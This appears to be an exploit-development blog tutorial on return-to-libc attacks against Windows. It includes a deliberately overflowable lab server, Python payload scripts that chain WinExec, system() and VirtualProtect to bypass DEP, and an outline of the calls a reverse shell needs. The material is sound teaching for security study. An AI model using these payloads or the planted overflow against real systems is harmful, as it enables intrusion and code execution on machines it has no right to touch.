Thilan Dissanayaka Exploit Development April 14, 2020

Return-to-libc on Windows

In the Linux ret2libc article, we bypassed DEP by calling system("/bin/sh") from libc. The concept on Windows is identical — call existing functions instead of injecting shellcode — but the details differ: different libraries, different calling conventions, different target functions, and different tools.

If you’re coming from the Windows buffer overflow tutorial where we used x32dbg and disabled DEP with CFF Explorer, this article picks up where that left off — but now DEP stays on.

The Windows Landscape

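On Linux, the C runtime (libc) gives us system(). On Windows, the useful functions are spread across several DLLs. kernel32.dll and ntdll.dll are mapped into every Win32 process; msvcrt.dll and user32.dll are only there if the program or one of its dependencies loads them: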

Library	Key Functions for ret2libc
kernel32.dll	`WinExec()`, `CreateProcessA()`, `LoadLibraryA()`, `VirtualProtect()`
msvcrt.dll	`system()`, the `_exec*()` family (`_execl()`, `_execv()`, ...): C runtime functions
ntdll.dll	Low-level NT API — `NtProtectVirtualMemory()`, etc.
user32.dll	`MessageBoxA()` — useful for proof of concept

The easiest targets:

WinExec("cmd.exe", 0) — 2 arguments, launches a command. Simplest option.
system("cmd.exe") — Same as Linux, from msvcrt.dll. One argument.
VirtualProtect() — Make the stack executable, then jump to shellcode. More complex but more powerful.

We’ll start with WinExec because it’s the most straightforward.

Calling Conventions — The Critical Difference

This is where Windows and Linux diverge, and where most cross-platform exploit devs get confused.

32-bit: stdcall vs cdecl

On Linux, most functions use cdecl — arguments pushed right-to-left, caller cleans the stack.

On Windows, most Win32 API functions use stdcall — arguments pushed right-to-left, callee cleans the stack.

Why does this matter? After WinExec returns (stdcall), it pops its own arguments off the stack. ESP is in a different position than it would be after a cdecl function. This changes how we chain calls.

cdecl (Linux libc):
  Before call:  ESP → [ret_addr] [arg1] [arg2]
  After return:  ESP → [arg1] [arg2]          ← Caller must clean up

stdcall (Windows API):
  Before call:  ESP → [ret_addr] [arg1] [arg2]
  After return:  ESP → (past arg2)            ← Callee already cleaned up

For a single ret2libc call, this difference doesn’t matter much — the function returns to whatever address was on the stack. But for chaining multiple calls, stdcall is actually easier — the callee cleans up, so we don’t need pop; ret gadgets between calls.

msvcrt.dll’s system() uses cdecl (it’s a C runtime function, not a Win32 API). So system() on Windows behaves exactly like on Linux. WinExec() uses stdcall.
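To make the difference concrete, here is a minimal sketch that computes where ESP ends up after each kind of return. The helper name esp_after_return is ours, and the entry value is only an example stack address (the same one that shows up in the debugging walkthrough later).

```python
WORD = 4  # bytes per stack slot on 32-bit x86


def esp_after_return(esp_at_entry, num_args, convention):
    """ESP right after the callee returns.

    At function entry ESP points at the return address,
    and the arguments sit directly above it.
    """
    if convention == "cdecl":
        # plain `ret`: only the return address is popped
        return esp_at_entry + WORD
    if convention == "stdcall":
        # `ret N`: the return address plus N bytes of arguments are popped
        return esp_at_entry + WORD + WORD * num_args
    raise ValueError(f"unknown convention: {convention}")


entry = 0x0022F9B4  # example ESP at function entry
print(hex(esp_after_return(entry, 2, "cdecl")))    # arguments still on the stack
print(hex(esp_after_return(entry, 2, "stdcall")))  # arguments already removed
```

With two arguments the two results differ by 8 bytes, which is exactly the space a pop; pop; ret gadget would have to clear after a cdecl function.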

64-bit: Microsoft x64 Calling Convention

On 64-bit Windows, the first 4 arguments go in registers RCX, RDX, R8, R9 (not RDI, RSI like Linux). And there’s a twist: the caller must reserve 32 bytes of shadow space on the stack, even if the function has fewer than 4 arguments.

Microsoft x64:
  RCX = arg 1
  RDX = arg 2
  R8  = arg 3
  R9  = arg 4
  Stack: [shadow 32 bytes] [arg 5] [arg 6] ...

Linux System V x64:
  RDI = arg 1
  RSI = arg 2
  RDX = arg 3
  RCX = arg 4
  R8  = arg 5
  R9  = arg 6

The shadow space is the main gotcha. If you forget it, the function writes to memory it shouldn’t and crashes. We’ll cover this in the 64-bit section.
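As a rough sketch of the two conventions, the helper below reports where an integer or pointer argument lives at function entry. The function name arg_location and the ABI labels are our own; the offsets assume RSP points at the return address, as it does on entry.

```python
MS_X64_REGS = ["RCX", "RDX", "R8", "R9"]
SYSV_REGS = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]


def arg_location(index, abi):
    """Location of integer/pointer argument `index` (0-based) at function entry."""
    if abi == "ms_x64":
        if index < 4:
            return MS_X64_REGS[index]
        # return address (8 bytes) + shadow space (32 bytes) = 0x28
        return f"[RSP+{0x28 + 8 * (index - 4):#x}]"
    if abi == "sysv":
        if index < 6:
            return SYSV_REGS[index]
        # only the return address sits below the stack arguments
        return f"[RSP+{0x8 + 8 * (index - 6):#x}]"
    raise ValueError(f"unknown ABI: {abi}")


for i in range(6):
    print(i + 1, arg_location(i, "ms_x64"), arg_location(i, "sysv"))
```

Note how the fifth Windows argument starts at RSP+0x28 rather than RSP+0x8: the 32 bytes in between are the shadow space.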

Setting Up the Lab

Same vulnerable TCP server from the Windows buffer overflow tutorial:

void handle_client(SOCKET client) {
    char buffer[512];
    int recv_size;
    recv_size = recv(client, buffer, 1024, 0);  // Overflow!
    buffer[recv_size] = '\0';
    printf("Received: %s\n", buffer);
    closesocket(client);
}

Environment:

Windows 7 32-bit (target)
DEP enabled (we do NOT disable it this time)
ASLR disabled (via CFF Explorer — set DllCharacteristics to 0x0100 for DEP-only, not 0x0000)
x32dbg for debugging

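To keep ASLR off but DEP on, the field must have IMAGE_DLLCHARACTERISTICS_NX_COMPAT (0x0100) set and IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040) cleared. With no other flags present, that gives 0x0100.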
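If the binary already has other flags set, it is safer to flip just the two bits than to overwrite the whole field. A small sketch of that arithmetic, with helper names (describe, dep_on_aslr_off) that are ours rather than anything CFF Explorer exposes:

```python
NX_COMPAT = 0x0100      # IMAGE_DLLCHARACTERISTICS_NX_COMPAT (DEP)
DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR)


def describe(flags):
    """Report which of the two mitigations a DllCharacteristics value enables."""
    return {"DEP": bool(flags & NX_COMPAT), "ASLR": bool(flags & DYNAMIC_BASE)}


def dep_on_aslr_off(flags):
    """Set NX_COMPAT, clear DYNAMIC_BASE, leave every other bit alone."""
    return (flags | NX_COMPAT) & ~DYNAMIC_BASE & 0xFFFF


original = 0x8140  # example value: DEP + ASLR + one unrelated flag
patched = dep_on_aslr_off(original)
print(hex(patched), describe(patched))
```

The value printed is what you would type into the DllCharacteristics field.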

Finding Addresses with x32dbg

Launch the vulnerable server inside x32dbg. Once the process is running, we need to find our target functions and strings.

Finding WinExec

WinExec lives in kernel32.dll. In x32dbg:

Go to the Symbols tab
Select kernel32.dll from the module list
Search for “WinExec” in the search bar
Note the address

Or use the command bar:

x32dbg> GetProcAddress kernel32.dll, WinExec

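Let’s say we find: WinExec = 0x7C8623AD. Treat every address in this article as a placeholder. The real value depends on the Windows version and patch level, and on Windows 7 system DLLs are also rebased at each boot, so re-check the addresses after a reboot.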

Finding system() in msvcrt.dll

If msvcrt.dll is loaded (it is for most C programs):

Symbols tab → select msvcrt.dll
Search for “system”

Let’s say: system = 0x77C293C7

Finding “cmd.exe” String

We need the string "cmd.exe" somewhere in readable memory. Options:

Option A: Search loaded modules

x32dbg → Memory Map tab → Right-click a module → Search for → String references → search “cmd”

Many Windows DLLs contain the string “cmd.exe” or “cmd” internally. If you find one, note its address.

Option B: Search the binary itself

x32dbg> findall "cmd.exe"

Option C: Use our buffer

We can place “cmd.exe” in our overflow payload and reference it by its stack address. This is less reliable (stack address changes), but works when ASLR is off.

Let’s say we find "cmd.exe" at 0x7C8369B0 inside kernel32.dll.
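The same search can be done offline on a copy of the DLL. The sketch below is a hypothetical helper (find_cstrings is our name) that looks for the string followed by a NUL byte, since WinExec and system() need a NUL-terminated ANSI string. It returns file offsets, not memory addresses, so each hit still has to be mapped to an address in the loaded module with the debugger.

```python
def find_cstrings(data, needle):
    """Return every offset where `needle` appears followed by a NUL byte."""
    target = needle + b"\x00"
    offsets = []
    pos = data.find(target)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(target, pos + 1)
    return offsets


# Stand-in for the bytes of a DLL; in practice: data = open(path, "rb").read()
blob = b"\x00run cmd.exe\x00junk cmd.exe /c\x00"
print(find_cstrings(blob, b"cmd.exe"))
```

Only the first occurrence is reported here, because the second one continues with " /c" before its terminator. A pointer into the middle of a longer string is fine as long as the bytes from that point up to the NUL are exactly the command we want.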

Finding exit() or ExitProcess()

For clean termination:

ExitProcess in kernel32.dll: 0x7C81CAFA

Exploit 1: WinExec(“cmd.exe”, 0) — 32-bit stdcall

WinExec has two parameters:

UINT WinExec(
    LPCSTR lpCmdLine,   // Command to execute ("cmd.exe")
    UINT   uCmdShow     // Window display (0 = SW_HIDE, 1 = SW_SHOWNORMAL)
);

We arrive at WinExec through ret, not call, so nothing pushes a return address or arguments for us. The payload has to place them exactly where a normal call would have left them. From WinExec’s perspective when it starts:

ESP →  [return address]        ← Where WinExec returns to
ESP+4  [lpCmdLine]             ← pointer to "cmd.exe"
ESP+8  [uCmdShow]              ← 0 (hidden) or 1 (visible)

This is the same layout as Linux ret2libc, just with an extra argument.

The Payload

import socket
import struct

p = lambda x: struct.pack("<I", x)

ip = "192.168.64.15"
port = 9999

offset = 528          # padding to EIP (524 to EBP + 4 for EBP)

winexec     = p(0x7C8623AD)   # WinExec in kernel32.dll
exit_proc   = p(0x7C81CAFA)   # ExitProcess in kernel32.dll
cmd_str     = p(0x7C8369B0)   # "cmd.exe" string in kernel32.dll
show_window = p(0x00000001)   # SW_SHOWNORMAL (1) — so we can see the cmd window

# Stack layout after ret:
# [padding] [WinExec] [ExitProcess] [cmd_str] [show_window]
#            ↑ EIP     ↑ return addr  ↑ arg1    ↑ arg2

payload  = b"A" * offset
payload += winexec              # Overwrite EIP → jump to WinExec
payload += exit_proc            # WinExec's return address → ExitProcess
payload += cmd_str              # arg1: lpCmdLine = "cmd.exe"
payload += show_window          # arg2: uCmdShow = 1

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()

A note on stdcall cleanup: WinExec ends with ret 8, which pops the return address (ExitProcess) into EIP and then discards its two arguments (8 bytes), so ESP moves past both cmd_str and show_window. ExitProcess then takes whatever follows on the stack as its exit code, which is harmless because it never returns.

For a single call, this just works.
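Before sending anything, it can help to unpack the tail of the payload and confirm each word sits in the slot we expect. This is only a sanity-check sketch that rebuilds the same payload with the placeholder addresses used above:

```python
import struct

offset = 528
payload = b"A" * offset + struct.pack(
    "<4I", 0x7C8623AD, 0x7C81CAFA, 0x7C8369B0, 0x00000001
)

labels = ["EIP -> WinExec", "return -> ExitProcess", "arg1 lpCmdLine", "arg2 uCmdShow"]
words = struct.unpack_from("<4I", payload, offset)
for label, word in zip(labels, words):
    print(f"{label:24} 0x{word:08X}")

# The vulnerable recv() reads at most 1024 bytes, so the payload must fit.
print("fits in recv:", len(payload) <= 1024)
```

If a word shows up in the wrong row, the offset or the packing order is off, and it is much cheaper to notice that here than in the debugger.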

Debugging in x32dbg

Set a breakpoint at the ret instruction of the vulnerable function. Send the payload.

x32dbg breakpoint hit.

Registers:
  EIP = 0x0040xxxx (about to execute ret)
  ESP = 0x0022F9B0

Stack at ESP:
  0x0022F9B0: 0x7C8623AD    ← WinExec (will be popped into EIP)
  0x0022F9B4: 0x7C81CAFA    ← ExitProcess (WinExec's return address)
  0x0022F9B8: 0x7C8369B0    ← "cmd.exe" pointer (arg1)
  0x0022F9BC: 0x00000001    ← SW_SHOWNORMAL (arg2)

Step into the ret:

  EIP = 0x7C8623AD (WinExec!)
  ESP = 0x0022F9B4 (past the popped address)

WinExec reads:

[ESP] = 0x7C81CAFA → return address (ExitProcess)
[ESP+4] = 0x7C8369B0 → derefs to “cmd.exe”
[ESP+8] = 0x00000001 → SW_SHOWNORMAL

Continue execution → cmd.exe window appears.

Exploit 2: system(“cmd.exe”) via msvcrt.dll

If msvcrt.dll is loaded, we can use system() — which uses cdecl, behaving exactly like Linux.

import socket
import struct

p = lambda x: struct.pack("<I", x)

ip, port = "192.168.64.15", 9999
offset = 528                    # same offset as Exploit 1

system_addr = p(0x77C293C7)   # system() in msvcrt.dll
exit_proc   = p(0x7C81CAFA)   # ExitProcess
cmd_str     = p(0x7C8369B0)   # "cmd.exe"

payload  = b"A" * offset
payload += system_addr          # EIP → system()
payload += exit_proc            # system's return address → ExitProcess
payload += cmd_str              # system's argument: "cmd.exe"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()

Identical layout to Linux ret2libc. cdecl is cdecl regardless of OS.

Chaining Functions — stdcall Makes It Easier

Here’s where stdcall actually helps us. Since the callee cleans up its own arguments, we don’t need pop; ret gadgets between calls.

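Example: Call LoadLibraryA("ws2_32.dll") then WinExec("cmd.exe", 1). Each function still needs its own return-address slot, so the two frames interleave:

stdcall chain (low address → high address):
[padding]
[LoadLibraryA]        ← overwritten EIP
[WinExec]             ← LoadLibraryA's return address
[ptr "ws2_32.dll"]    ← LoadLibraryA arg1
[ExitProcess]         ← WinExec's return address
[ptr "cmd.exe"]       ← WinExec arg1
[1]                   ← WinExec arg2

After LoadLibraryA returns:

Its ret 4 pops the WinExec address into EIP
It then discards its 1 argument (4 bytes) from the stack
ESP now points to the ExitProcess slot, which WinExec sees as its return address, with cmd_str at ESP+4 as its first argument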

No gadgets needed. stdcall’s cleanup behavior naturally chains function calls.

Compare to cdecl (Linux):

cdecl chain (needs pop;ret gadgets):
[padding] [setuid] [pop;ret] [0] [system] [exit] ["/bin/sh"]

On Linux, we needed a pop; ret gadget to clean up setuid’s argument before system(). On Windows with stdcall, the function does it for us.

The catch: The number of arguments must match exactly. If a stdcall function expects 2 arguments, it pops 8 bytes. If you get the argument count wrong, the stack is misaligned and the chain breaks.
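Getting the interleaving right by hand is error-prone, so here is a minimal sketch of a builder for 32-bit stdcall chains. The function stdcall_chain is our own helper, and the LoadLibraryA address and the "ws2_32.dll" pointer are hypothetical placeholders. Each call contributes the address of the next function (which acts as its return address) followed by its own arguments.

```python
import struct


def stdcall_chain(calls, final_ret):
    """Pack a chain of stdcall calls.

    calls: list of (function_address, [args]) in execution order.
    final_ret: where the last function returns to.
    """
    words = [calls[0][0]]             # first function lands in EIP
    for i, (_, args) in enumerate(calls):
        next_addr = calls[i + 1][0] if i + 1 < len(calls) else final_ret
        words.append(next_addr)       # return address seen by call i
        words.extend(args)            # removed by call i's own `ret N`
    return struct.pack(f"<{len(words)}I", *words)


LOADLIBRARYA = 0x7C801D7B   # placeholder address
WINEXEC      = 0x7C8623AD
EXITPROCESS  = 0x7C81CAFA
PTR_DLL      = 0x00403010   # placeholder pointer to "ws2_32.dll"
PTR_CMD      = 0x7C8369B0

chain = stdcall_chain(
    [(LOADLIBRARYA, [PTR_DLL]), (WINEXEC, [PTR_CMD, 1])],
    EXITPROCESS,
)
print([hex(w) for w in struct.unpack("<6I", chain)])
```

The argument lists double as the argument counts, so a wrong count for any function shifts every slot after it.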

Exploit 3: Reverse Shell — Chaining Multiple Calls

For a remote exploit, a cmd.exe window on the target machine isn’t useful — we need a reverse shell. This requires chaining several calls to load WinSock and connect back to us.

This gets complex enough that ROP is usually the better approach. But here’s the conceptual chain:

LoadLibraryA("ws2_32.dll")      → Load WinSock library
WSAStartup(0x0202, &wsadata)    → Initialize WinSock
WSASocketA(2, 1, 0, 0, 0, 0)   → Create a TCP socket
connect(sock, &sockaddr, 16)    → Connect to attacker
CreateProcessA(NULL, "cmd.exe", ..., &startupinfo, ...) → Spawn cmd with redirected I/O

Each function has multiple arguments, and CreateProcessA has 10 parameters. Managing this with ret2libc alone is painful — this is exactly where ROP chains become necessary.

For practical remote exploitation on Windows, the typical approach is:

ret2libc: VirtualProtect(stack, 0x1000, PAGE_EXECUTE_READWRITE, &old)
     ↓
Stack is now executable
     ↓
Jump to shellcode on the stack (reverse shell shellcode from msfvenom)

This combines ret2libc (one function call to disable DEP for our stack region) with traditional shellcode execution.
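On 32-bit, that single call fits in one stack frame. The sketch below shows one way the payload could be laid out, under several assumptions: ASLR is off so the stack address of the saved return address (ret_slot) is known, writable_addr points at any writable DWORD, and the VirtualProtect address, the writable address, and the four-byte shellcode are all placeholders. VirtualProtect's return address is set to the first byte after its frame, which is where the shellcode sits.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40


def virtualprotect_payload(offset, virtualprotect, ret_slot, writable_addr, shellcode):
    """Build [padding][VirtualProtect frame][shellcode] for a 32-bit target."""
    shellcode_addr = ret_slot + 6 * 4    # six 4-byte words precede the shellcode
    frame = struct.pack(
        "<6I",
        virtualprotect,                  # lands in EIP
        shellcode_addr,                  # return address: jump to the shellcode
        shellcode_addr,                  # lpAddress (applies to the whole page)
        len(shellcode),                  # dwSize
        PAGE_EXECUTE_READWRITE,          # flNewProtect
        writable_addr,                   # lpflOldProtect, must be writable
    )
    return b"A" * offset + frame + shellcode


payload = virtualprotect_payload(
    offset=528,
    virtualprotect=0x7C801AD4,           # placeholder address
    ret_slot=0x0022F9B0,                 # example stack address of the saved EIP
    writable_addr=0x00403000,            # placeholder writable location
    shellcode=b"\xCC" * 4,               # int3 placeholder, not a real payload
)
print(len(payload))
```

The size is kept to the shellcode length on purpose: the protection change covers whole pages anyway, and a large range risks running past the end of the committed stack, which would make the call fail.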

64-bit Windows — The Shadow Space Problem

On 64-bit Windows, the calling convention is Microsoft x64 fastcall:

First 4 arguments: RCX, RDX, R8, R9
The caller must allocate 32 bytes of shadow space on the stack before the call
Additional arguments go on the stack after the shadow space

Stack layout for a function call (64-bit Windows):
RSP →  [return address]
RSP+8  [shadow space: 32 bytes (even if unused)]
RSP+40 [5th argument, if any]
RSP+48 [6th argument, if any]

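The shadow space exists so the callee can spill the register arguments to the stack if needed. The callee treats those 32 bytes as its own scratch area. In an exploit they are the four slots directly above the function’s return address, so anything you put there (such as the next entries of a chain) may be overwritten, and the chain crashes when it reaches them.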

ret2libc on 64-bit Windows

We need gadgets to:

Load RCX with the first argument (pop rcx; ret)
Load RDX with the second argument (pop rdx; ret)
Leave 32 bytes of shadow space directly above the function’s return address

from struct import pack
p64 = lambda x: pack("<Q", x)

offset = 72                          # varies per binary

# All addresses are placeholders; take real ones from your own target
pop_rcx  = p64(0x00007FFA1234ABCD)   # pop rcx; ret (from a loaded DLL)
pop_rdx  = p64(0x00007FFA1234ABD0)   # pop rdx; ret (hypothetical gadget)
cmd_str  = p64(0x00007FFA56789012)   # "cmd.exe" string address
winexec  = p64(0x00007FFA11223344)   # WinExec address
ret      = p64(0x00007FFA1234ABCE)   # ret gadget (alignment)
exit_p   = p64(0x00007FFA55667788)   # ExitProcess

payload  = b"A" * offset
payload += pop_rcx                   # Load first arg into RCX
payload += cmd_str                   # RCX = "cmd.exe"
payload += pop_rdx                   # Load second arg into RDX
payload += p64(0x00000000)           # RDX = 0 (uCmdShow)
payload += ret                       # Alignment (drop it if RSP is already aligned)
payload += winexec                   # Call WinExec
payload += exit_p                    # WinExec's return address → ExitProcess
payload += b"B" * 32                 # Shadow space WinExec may overwrite

In practice, 64-bit Windows ret2libc almost always requires ROP gadgets to set up registers — the line between ret2libc and ROP disappears entirely on 64-bit.
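Whether the extra ret gadget is needed depends on where the function pointer lands on the stack. The Microsoft x64 convention keeps RSP 16-byte aligned before a call, so a function expects RSP % 16 == 8 on entry (the call has just pushed 8 bytes). A small sketch of that check, with a helper name and example addresses of our own:

```python
def needs_alignment_ret(func_slot_addr):
    """True if one extra `ret` gadget should precede the function address.

    func_slot_addr: stack address of the chain slot holding the function pointer.
    The `ret` that consumes that slot leaves RSP = func_slot_addr + 8.
    """
    rsp_at_entry = func_slot_addr + 8
    return rsp_at_entry % 16 != 8


# Example stack addresses (hypothetical)
print(needs_alignment_ret(0x000000000014F7A0))
print(needs_alignment_ret(0x000000000014F7A8))
```

Each ret gadget shifts the function pointer by one 8-byte slot, so a single one is always enough to fix the alignment. Functions that use aligned SSE instructions are the ones that typically crash when this is wrong.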

Finding Addresses in x32dbg — Quick Reference

Finding functions:
  Symbols tab → Select module (kernel32, msvcrt, ntdll)
  → Search for function name
  → Note the address

Finding strings:
  Memory Map → Right-click module → Search for → String references
  Or: CPU tab → Right-click → Search for → All referenced strings

Finding gadgets (for chaining):
  Use ROPgadget externally on a copy of the DLL:
  $ ROPgadget --binary kernel32.dll --only "pop|ret"

Setting breakpoints:
  Command bar: bp 0x7C8623AD  (break on WinExec)
  Or: Ctrl+G → enter address → F2

Examining the stack:
  Stack panel shows ESP and values
  Or: dump at ESP in the hex dump panel

Checking DEP status:
  Memory Map tab → check page permissions
  Stack pages should show "RW" (not "RWX")

Comparison — Linux vs Windows ret2libc

Aspect	Linux	Windows
Target function	`system("/bin/sh")`	`WinExec("cmd.exe", 1)` or `system("cmd.exe")`
Library	libc.so	kernel32.dll, msvcrt.dll
32-bit convention	cdecl (caller cleans)	stdcall (callee cleans) for API, cdecl for CRT
64-bit convention	System V (rdi, rsi, rdx)	MS x64 (rcx, rdx, r8, r9 + 32-byte shadow)
Chaining (32-bit)	Needs `pop; ret` between calls	stdcall chains naturally (callee cleans)
String availability	“/bin/sh” in libc	“cmd.exe” sometimes in kernel32 (search required)
Debugger	GDB	x32dbg / x64dbg
DEP control	Linker flags (`-z execstack` / `-z noexecstack`)	PE header DllCharacteristics
Gadget tools	ROPgadget, ropper	ROPgadget, ropper, mona.py (Immunity)

The fundamental technique is the same. You’re overwriting the return address with a function pointer and arranging arguments on the stack. The OS-specific details are calling conventions, target functions, and tooling.

When ret2libc Isn’t Enough

Just like on Linux, Windows ret2libc has limitations:

Complex payloads (reverse shells) require too many chained calls
64-bit requires register gadgets anyway (it’s already ROP)
ASLR randomizes kernel32.dll and msvcrt.dll base addresses

The most common Windows DEP bypass in practice:

ROP chain → VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old)
         → Stack is now executable
         → Jump to shellcode on the stack

This requires a full ROP chain to set up VirtualProtect’s 4 arguments, but the result is powerful — you get unrestricted code execution via shellcode once DEP is disabled for your stack region.

For building Windows ROP chains, mona.py (a plugin for Immunity Debugger) is the gold standard:

!mona rop -m kernel32.dll,msvcrt.dll
!mona rop -m * -cpb "\x00\x0a\x0d"

It automatically finds gadgets and generates VirtualProtect / VirtualAlloc ROP chains.

Final Thoughts

ret2libc on Windows follows the same principle as Linux — reuse existing code to bypass DEP. The main differences are the calling conventions (stdcall vs cdecl, shadow space on 64-bit) and the target functions (WinExec, CreateProcess, VirtualProtect instead of system and execve).

If you’re comfortable with the Linux ret2libc and the Windows buffer overflow, this article bridges the two. The next step — building full ROP chains on Windows — is where the real power lies, especially the VirtualProtect technique that re-enables shellcode execution.

Happy reversing!